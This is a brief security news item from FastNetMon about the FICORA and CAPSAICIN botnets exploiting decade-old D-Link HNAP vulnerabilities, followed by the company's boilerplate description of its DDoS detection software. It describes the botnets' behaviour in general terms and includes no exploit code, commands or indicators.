Cybersecurity researchers have reported a surge in malicious activity involving the exploitation of old D-Link router vulnerabilities by two different botnets, FICORA and CAPSAICIN. These botnets spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via the Home Network Administration Protocol (HNAP) interface.
The FICORA botnet attacks have targeted various countries globally, deploying a downloader shell script from a remote server, which then downloads the main payload for different Linux architectures. The botnet malware includes a brute-force attack function and features to conduct distributed denial-of-service (DDoS) attacks using UDP, TCP, and DNS protocols.
On the other hand, CAPSAICIN primarily targets East Asian territories like Japan and Taiwan. It leverages a different IP address and follows a similar approach to fetch the botnet for various Linux architectures. CAPSAICIN establishes a connection socket with its command-and-control server, sending the victim host’s OS information and the nickname given by the malware back to the server. It then awaits further commands to be executed on the compromised devices, including various malicious operations.
Despite these vulnerabilities being exposed and patched nearly a decade ago, these attacks remain active worldwide. This highlights the importance of regular kernel updates and comprehensive monitoring for all enterprises to ensure network security.
About FastNetMon
FastNetMon delivers versatile DDoS detection software for companies at any scale. With extensive experience in the telecom, mobile, and cloud computing industries, we take pride in preventing DDoS attacks and protecting our customers’ networks to the highest standard.